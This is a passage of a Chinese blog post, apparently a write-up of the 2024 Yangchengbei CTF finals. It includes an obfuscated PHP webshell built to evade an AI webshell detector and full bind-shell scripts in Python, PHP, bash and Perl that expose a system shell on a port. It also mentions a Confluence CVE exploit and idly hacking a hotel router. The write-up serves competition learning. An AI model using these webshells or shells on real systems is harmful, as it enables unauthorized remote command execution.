<h2 id="flag14"><a href="#flag14" class="headerlink" title="flag14"></a>flag14</h2><p>是一个ai webshell检测的功能，传个免杀图片马秒了，附件都没来得及看</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token variable">$a</span> <span class="token operator">=</span> <span class="token string double-quoted-string">"s#y#s#t#e#m"</span><span class="token punctuation">;</span>
<span class="token variable">$b</span> <span class="token operator">=</span> <span class="token function">explode</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"#"</span><span class="token punctuation">,</span><span class="token variable">$a</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$c</span> <span class="token operator">=</span> <span class="token variable">$b</span><span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token operator">.</span><span class="token variable">$b</span><span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">]</span><span class="token operator">.</span><span class="token variable">$b</span><span class="token punctuation">[</span><span class="token number">2</span><span class="token punctuation">]</span><span class="token operator">.</span><span class="token variable">$b</span><span class="token punctuation">[</span><span class="token number">3</span><span class="token punctuation">]</span><span class="token operator">.</span><span class="token variable">$b</span><span class="token punctuation">[</span><span class="token number">4</span><span class="token punctuation">]</span><span class="token operator">.</span><span class="token variable">$b</span><span class="token punctuation">[</span><span class="token number">5</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token variable">$c</span><span class="token punctuation">(</span><span class="token variable">$_REQUEST</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'cmd'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token delimiter important">?></span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p><img src="/blog/2024/09/11/2024%E7%BE%8A%E5%9F%8E%E6%9D%AF%E5%86%B3%E8%B5%9B/image-20240911144622193.png" alt="image-20240911144622193"></p>
<p><img src="/blog/2024/09/11/2024%E7%BE%8A%E5%9F%8E%E6%9D%AF%E5%86%B3%E8%B5%9B/image-20240911150845814.png" alt="image-20240911150845814"></p>
<hr>
<h2 id="flag04"><a href="#flag04" class="headerlink" title="flag04"></a>flag04</h2><p>Confluence 扫出个 cve2021 的洞，队友打掉了</p>
<p>剩下的只能说来不及了，Nacos没时间打</p>
<hr>
<h1 id="应急响应"><a href="#应急响应" class="headerlink" title="应急响应"></a>应急响应</h1><h2 id="flag02-1"><a href="#flag02-1" class="headerlink" title="flag02"></a>flag02</h2><blockquote>
<p>对该企业中的Web应用服务器进行入侵排查，找到攻击者留下的Webshell，提交Webshell文件名称。</p>
</blockquote>
<p>ai tech站上马之后发现 public 下还有另一个马</p>
<p><img src="/blog/2024/09/11/2024%E7%BE%8A%E5%9F%8E%E6%9D%AF%E5%86%B3%E8%B5%9B/image-20240911135929444.png" alt="image-20240911135929444"></p>
<p><img src="/blog/2024/09/11/2024%E7%BE%8A%E5%9F%8E%E6%9D%AF%E5%86%B3%E8%B5%9B/image-20240914001456608.png" alt="image-20240914001456608"></p>
<hr>
<h2 id="flag01-1"><a href="#flag01-1" class="headerlink" title="flag01"></a>flag01</h2><p>拿到官网的shell就能翻到了</p>
<hr>
<h2 id="flag03-1"><a href="#flag03-1" class="headerlink" title="flag03"></a>flag03</h2><p>队友做的，我不到啊</p>
<hr>
<h1 id="后日谈"><a href="#后日谈" class="headerlink" title="后日谈"></a>后日谈</h1><p><del>没能让安恒渗透满意真是抱歉</del></p>
<p>这次输给时间了，早上浪费了太多时间在官网了导致后面内网打起来手忙脚乱，而且本科组的强度确实恐怖，北邮✌ak了是真的猛，<del>咱这分要是去隔壁组也能混个二等奖了</del></p>
<p><img src="/blog/2024/09/11/2024%E7%BE%8A%E5%9F%8E%E6%9D%AF%E5%86%B3%E8%B5%9B/image-20240914004437214.png" alt="image-20240914004437214"></p>
<p>主持人滚榜，嗯我在期待什么（柚子厨好有实力</p>
<br>

<p>不过本来也是抱着出差玩的心情来打的，诶这酒店的早晚餐还挺丰盛😋</p>
<p>话说如果巅峰极客，羊城杯，京津冀长城杯全进线下赛的话，是不是这几天基本上是全国可飞🤔</p>
<p>没活了，进个酒店路由器玩玩（</p>
<p><img src="/blog/2024/09/11/2024%E7%BE%8A%E5%9F%8E%E6%9D%AF%E5%86%B3%E8%B5%9B/image-20240910232605385.png" alt="image-20240910232605385"></p>
<p><img src="/blog/2024/09/11/2024%E7%BE%8A%E5%9F%8E%E6%9D%AF%E5%86%B3%E8%B5%9B/image-20240910232355400.png" alt="image-20240910232355400"></p>
<p>有报销公费出差，挺好（（</p>
<h2 id="docker内部内网ip的获取"><a href="#docker内部内网ip的获取" class="headerlink" title="docker内部内网ip的获取"></a>docker内部内网ip的获取</h2><p>在轻量化镜像里，缺少<code>ipconfig</code>等命令，这时候要考虑读取读取<code>/etc/hosts</code>来获取内网ip</p>
<p><img src="/blog/2024/09/11/2024%E7%BE%8A%E5%9F%8E%E6%9D%AF%E5%86%B3%E8%B5%9B/image-20240915120538976.png" alt="image-20240915120538976"></p>
<hr>
<h2 id="正向shell"><a href="#正向shell" class="headerlink" title="正向shell"></a>正向shell</h2><p>参考：</p>
<p><a target="_blank" rel="noopener" href="https://github.com/ReAbout/web-sec/blob/master/penetration/PEN-ReShell.md">https://github.com/ReAbout/web-sec/blob/master/penetration/PEN-ReShell.md</a></p>
<p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/10843">https://xz.aliyun.com/t/10843</a></p>
<p>需要自己实现socket</p>
<p>python in windows：</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token keyword">from</span> socket <span class="token keyword">import</span> <span class="token operator">*</span>
<span class="token keyword">import</span> subprocess
<span class="token keyword">import</span> os<span class="token punctuation">,</span> threading

<span class="token keyword">def</span> <span class="token function">send</span><span class="token punctuation">(</span>talk<span class="token punctuation">,</span> proc<span class="token punctuation">)</span><span class="token punctuation">:</span>
        <span class="token keyword">import</span> time
        <span class="token keyword">while</span> <span class="token boolean">True</span><span class="token punctuation">:</span>
                msg <span class="token operator">=</span> proc<span class="token punctuation">.</span>stdout<span class="token punctuation">.</span>readline<span class="token punctuation">(</span><span class="token punctuation">)</span>
                talk<span class="token punctuation">.</span>send<span class="token punctuation">(</span>msg<span class="token punctuation">)</span>

<span class="token keyword">if</span> __name__ <span class="token operator">==</span> <span class="token string">"__main__"</span><span class="token punctuation">:</span>
        server<span class="token operator">=</span>socket<span class="token punctuation">(</span>AF_INET<span class="token punctuation">,</span>SOCK_STREAM<span class="token punctuation">)</span>
        server<span class="token punctuation">.</span>bind<span class="token punctuation">(</span><span class="token punctuation">(</span><span class="token string">'0.0.0.0'</span><span class="token punctuation">,</span><span class="token number">7777</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
        server<span class="token punctuation">.</span>listen<span class="token punctuation">(</span><span class="token number">5</span><span class="token punctuation">)</span>
        <span class="token keyword">print</span> <span class="token string">'waiting for connect'</span>
        talk<span class="token punctuation">,</span> addr <span class="token operator">=</span> server<span class="token punctuation">.</span>accept<span class="token punctuation">(</span><span class="token punctuation">)</span>
        <span class="token keyword">print</span> <span class="token string">'connect from'</span><span class="token punctuation">,</span>addr
        proc <span class="token operator">=</span> subprocess<span class="token punctuation">.</span>Popen<span class="token punctuation">(</span><span class="token string">'cmd.exe /K'</span><span class="token punctuation">,</span> stdin<span class="token operator">=</span>subprocess<span class="token punctuation">.</span>PIPE<span class="token punctuation">,</span> 
                stdout<span class="token operator">=</span>subprocess<span class="token punctuation">.</span>PIPE<span class="token punctuation">,</span> stderr<span class="token operator">=</span>subprocess<span class="token punctuation">.</span>PIPE<span class="token punctuation">,</span> shell<span class="token operator">=</span><span class="token boolean">True</span><span class="token punctuation">)</span>
        t <span class="token operator">=</span> threading<span class="token punctuation">.</span>Thread<span class="token punctuation">(</span>target <span class="token operator">=</span> send<span class="token punctuation">,</span> args <span class="token operator">=</span> <span class="token punctuation">(</span>talk<span class="token punctuation">,</span> proc<span class="token punctuation">)</span><span class="token punctuation">)</span>
        t<span class="token punctuation">.</span>setDaemon<span class="token punctuation">(</span><span class="token boolean">True</span><span class="token punctuation">)</span>
        t<span class="token punctuation">.</span>start<span class="token punctuation">(</span><span class="token punctuation">)</span>
        <span class="token keyword">while</span> <span class="token boolean">True</span><span class="token punctuation">:</span>
                cmd<span class="token operator">=</span>talk<span class="token punctuation">.</span>recv<span class="token punctuation">(</span><span class="token number">1024</span><span class="token punctuation">)</span>
                proc<span class="token punctuation">.</span>stdin<span class="token punctuation">.</span>write<span class="token punctuation">(</span>cmd<span class="token punctuation">)</span>
                proc<span class="token punctuation">.</span>stdin<span class="token punctuation">.</span>flush<span class="token punctuation">(</span><span class="token punctuation">)</span>
        server<span class="token punctuation">.</span>close<span class="token punctuation">(</span><span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>python in linux：</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token keyword">from</span> socket <span class="token keyword">import</span> <span class="token operator">*</span>
<span class="token keyword">import</span> subprocess
<span class="token keyword">import</span> os<span class="token punctuation">,</span> threading<span class="token punctuation">,</span> sys<span class="token punctuation">,</span> time

<span class="token keyword">if</span> __name__ <span class="token operator">==</span> <span class="token string">"__main__"</span><span class="token punctuation">:</span>
        server<span class="token operator">=</span>socket<span class="token punctuation">(</span>AF_INET<span class="token punctuation">,</span>SOCK_STREAM<span class="token punctuation">)</span>
        server<span class="token punctuation">.</span>bind<span class="token punctuation">(</span><span class="token punctuation">(</span><span class="token string">'0.0.0.0'</span><span class="token punctuation">,</span><span class="token number">7777</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
        server<span class="token punctuation">.</span>listen<span class="token punctuation">(</span><span class="token number">5</span><span class="token punctuation">)</span>
        <span class="token keyword">print</span> <span class="token string">'waiting for connect'</span>
        talk<span class="token punctuation">,</span> addr <span class="token operator">=</span> server<span class="token punctuation">.</span>accept<span class="token punctuation">(</span><span class="token punctuation">)</span>
        <span class="token keyword">print</span> <span class="token string">'connect from'</span><span class="token punctuation">,</span>addr
        proc <span class="token operator">=</span> subprocess<span class="token punctuation">.</span>Popen<span class="token punctuation">(</span><span class="token punctuation">[</span><span class="token string">"/bin/sh"</span><span class="token punctuation">,</span><span class="token string">"-i"</span><span class="token punctuation">]</span><span class="token punctuation">,</span> stdin<span class="token operator">=</span>talk<span class="token punctuation">,</span>
                stdout<span class="token operator">=</span>talk<span class="token punctuation">,</span> stderr<span class="token operator">=</span>talk<span class="token punctuation">,</span> shell<span class="token operator">=</span><span class="token boolean">True</span><span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>php in linux（需要开启 socket 扩展）：</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token function">error_reporting</span><span class="token punctuation">(</span><span class="token constant">E_ALL</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

<span class="token variable">$server</span> <span class="token operator">=</span> <span class="token function">socket_create</span><span class="token punctuation">(</span><span class="token constant">AF_INET</span><span class="token punctuation">,</span> <span class="token constant">SOCK_STREAM</span><span class="token punctuation">,</span> <span class="token constant">SOL_TCP</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token function">socket_bind</span><span class="token punctuation">(</span><span class="token variable">$server</span><span class="token punctuation">,</span> <span class="token string single-quoted-string">'0.0.0.0'</span><span class="token punctuation">,</span> <span class="token number">7777</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token function">socket_listen</span><span class="token punctuation">(</span><span class="token variable">$server</span><span class="token punctuation">,</span> <span class="token number">5</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

<span class="token keyword">echo</span> <span class="token string double-quoted-string">"Waiting for connection...\n"</span><span class="token punctuation">;</span>

<span class="token variable">$client</span> <span class="token operator">=</span> <span class="token function">socket_accept</span><span class="token punctuation">(</span><span class="token variable">$server</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">echo</span> <span class="token string double-quoted-string">"Connection accepted.\n"</span><span class="token punctuation">;</span>

<span class="token variable">$descriptorspec</span> <span class="token operator">=</span> <span class="token punctuation">[</span>
    <span class="token number">0</span> <span class="token operator">=></span> <span class="token variable">$client</span><span class="token punctuation">,</span>
    <span class="token number">1</span> <span class="token operator">=></span> <span class="token variable">$client</span><span class="token punctuation">,</span>
    <span class="token number">2</span> <span class="token operator">=></span> <span class="token variable">$client</span>
<span class="token punctuation">]</span><span class="token punctuation">;</span>

<span class="token variable">$process</span> <span class="token operator">=</span> <span class="token function">proc_open</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'/bin/sh -i'</span><span class="token punctuation">,</span> <span class="token variable">$descriptorspec</span><span class="token punctuation">,</span> <span class="token variable">$pipes</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token function">is_resource</span><span class="token punctuation">(</span><span class="token variable">$process</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
    <span class="token keyword">while</span> <span class="token punctuation">(</span><span class="token operator">!</span><span class="token function">feof</span><span class="token punctuation">(</span><span class="token variable">$pipes</span><span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
        <span class="token variable">$output</span> <span class="token operator">=</span> <span class="token function">fgets</span><span class="token punctuation">(</span><span class="token variable">$pipes</span><span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">]</span><span class="token punctuation">,</span> <span class="token number">1024</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token variable">$output</span> <span class="token operator">!==</span> <span class="token constant boolean">false</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
            <span class="token function">socket_write</span><span class="token punctuation">(</span><span class="token variable">$client</span><span class="token punctuation">,</span> <span class="token variable">$output</span><span class="token punctuation">,</span> <span class="token function">strlen</span><span class="token punctuation">(</span><span class="token variable">$output</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token punctuation">&#125;</span>
    <span class="token punctuation">&#125;</span>

    <span class="token function">proc_close</span><span class="token punctuation">(</span><span class="token variable">$process</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>

<span class="token function">socket_close</span><span class="token punctuation">(</span><span class="token variable">$client</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token function">socket_close</span><span class="token punctuation">(</span><span class="token variable">$server</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token delimiter important">?></span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>bash in linux（需要 &#x2F;dev&#x2F;tcp 可用）：</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token shebang important">#!/bin/bash</span>

<span class="token comment"># 创建 TCP 服务器</span>
<span class="token builtin class-name">exec</span> <span class="token operator"><span class="token file-descriptor important">3</span>&lt;></span>/dev/tcp/0.0.0.0/7777

<span class="token builtin class-name">echo</span> <span class="token string">"Waiting for connection..."</span>

<span class="token comment"># 接受连接并打印连接信息</span>
<span class="token keyword">while</span> <span class="token boolean">true</span>
<span class="token keyword">do</span>
    <span class="token builtin class-name">read</span> <span class="token operator">&lt;</span><span class="token file-descriptor important">&amp;3</span>
    <span class="token builtin class-name">echo</span> <span class="token string">"Connect from <span class="token environment constant">$REPLY</span>"</span>
    <span class="token builtin class-name">exec</span> <span class="token operator"><span class="token file-descriptor important">4</span>&lt;</span><span class="token file-descriptor important">&amp;3</span> <span class="token operator"><span class="token file-descriptor important">5</span>></span><span class="token file-descriptor important">&amp;1</span> <span class="token operator"><span class="token file-descriptor important">6</span>></span><span class="token file-descriptor important">&amp;2</span>
    <span class="token function">bash</span> <span class="token operator">&lt;</span><span class="token file-descriptor important">&amp;4</span> <span class="token operator">></span><span class="token file-descriptor important">&amp;5</span> <span class="token operator"><span class="token file-descriptor important">2</span>></span><span class="token file-descriptor important">&amp;6</span>
<span class="token keyword">done</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>perl in linux：</p>
<pre class="line-numbers language-perl" data-language="perl"><code class="language-perl"><span class="token comment">#!/usr/bin/perl</span>

<span class="token keyword">use</span> strict<span class="token punctuation">;</span>
<span class="token keyword">use</span> warnings<span class="token punctuation">;</span>
<span class="token keyword">use</span> IO<span class="token punctuation">:</span><span class="token punctuation">:</span>Socket<span class="token punctuation">;</span>

<span class="token keyword">my</span> <span class="token variable">$server</span> <span class="token operator">=</span> IO<span class="token punctuation">:</span><span class="token punctuation">:</span>Socket<span class="token punctuation">:</span><span class="token punctuation">:</span>INET<span class="token operator">-></span>new<span class="token punctuation">(</span>
    LocalAddr <span class="token operator">=></span> <span class="token string">'0.0.0.0'</span><span class="token punctuation">,</span>
    LocalPort <span class="token operator">=></span> <span class="token number">7777</span><span class="token punctuation">,</span>
    Proto     <span class="token operator">=></span> <span class="token string">'tcp'</span><span class="token punctuation">,</span>
    Listen    <span class="token operator">=></span> <span class="token number">5</span><span class="token punctuation">,</span>
    Reuse     <span class="token operator">=></span> <span class="token number">1</span>
<span class="token punctuation">)</span> <span class="token operator">or</span> <span class="token keyword">die</span> <span class="token string">"Can't create server: $!\n"</span><span class="token punctuation">;</span>

<span class="token keyword">print</span> <span class="token string">"Waiting for connection...\n"</span><span class="token punctuation">;</span>

<span class="token keyword">while</span> <span class="token punctuation">(</span><span class="token keyword">my</span> <span class="token variable">$client</span> <span class="token operator">=</span> <span class="token variable">$server</span><span class="token operator">-></span>accept<span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
    <span class="token keyword">print</span> <span class="token string">"Connect from "</span><span class="token punctuation">,</span> <span class="token variable">$client</span><span class="token operator">-></span>peerhost<span class="token punctuation">,</span> <span class="token string">":"</span><span class="token punctuation">,</span> <span class="token variable">$client</span><span class="token operator">-></span>peerport<span class="token punctuation">,</span> <span class="token string">"\n"</span><span class="token punctuation">;</span>
    
    open STDIN<span class="token punctuation">,</span>  <span class="token string">"&lt;&amp;"</span><span class="token punctuation">,</span> <span class="token variable">$client</span><span class="token punctuation">;</span>
    open STDOUT<span class="token punctuation">,</span> <span class="token string">">&amp;"</span><span class="token punctuation">,</span> <span class="token variable">$client</span><span class="token punctuation">;</span>
    open STDERR<span class="token punctuation">,</span> <span class="token string">">&amp;"</span><span class="token punctuation">,</span> <span class="token variable">$client</span><span class="token punctuation">;</span>

    system<span class="token punctuation">(</span><span class="token string">"/bin/sh -i"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    
    close STDERR<span class="token punctuation">;</span>
    close STDOUT<span class="token punctuation">;</span>
    close STDIN<span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p><img src="/blog/2024/09/11/2024%E7%BE%8A%E5%9F%8E%E6%9D%AF%E5%86%B3%E8%B5%9B/image-20240915124155910.png" alt="image-20240915124155910"></p>
<p><img src="/blog/2024/09/11/2024%E7%BE%8A%E5%9F%8E%E6%9D%AF%E5%86%B3%E8%B5%9B/image-20240915124226334.png" alt="image-20240915124226334"></p>
<hr>
<h2 id="正向代理"><a href="#正向代理" class="headerlink" title="正向代理"></a>正向代理</h2><p>使用 Neo-reGeorg 工具进行正向代理</p>
<p>项目地址： <a target="_blank" rel="noopener" href="https://github.com/L-codes/Neo-reGeorg">https://github.com/L-codes/Neo-reGeorg</a></p>

    </div>
    
    
    
    
    
    
    
</div>

      </div>
    </transition>
    
    <transition name="fade">
      <div id="preview" ref="preview" v-show="previewShow">
        <img id="preview-content" ref="previewContent" />
      </div>
    </transition>
    
  </div>
  <script src="/blog/js/main.js"></script>
  
  




  
  

<div id="vcomments"></div>
<script defer src="/blog/js/lib/valine.min.js" onload="
    new Valine({
        el: '#vcomments',
        app_id: 'U9mZLKunkRUTcBFthjXPjnZE-9Nh9j0Va',
        app_key: 'SzWOnY0PWLGNuL6jW8TZYc7j',
        visitor: 'true',
        placeholder: '写点什么吧(●ˇ∀ˇ●)',
        serverURLs: 'https://u9mzlkun.lc-cn-n1-shared.com',
    });
"></script>


  <footer id="footer">
    <div id="footer-wrap">
        <div>
            &copy;
            2022 - 2026 雲流のLowest World
            <span id="footer-icon">
                <i class="fa-solid fa-font-awesome fa-fw"></i>
            </span>
            &commat;C1oudfL0w0
        </div>
        <div>
            Based on the <a target="_blank" rel="noopener" href="https://hexo.io">Hexo Engine</a> &amp;
            <a target="_blank" rel="noopener" href="https://github.com/argvchs/hexo-theme-particlex">ParticleX Theme</a>
        </div>
        
    </div>
</footer>

<script src="/blog/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"model":{"jsonPath":"/blog/live2dw/assets/z16.model.json"},"display":{"position":"left","width":150,"height":290},"mobile":{"show":false},"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>

</html>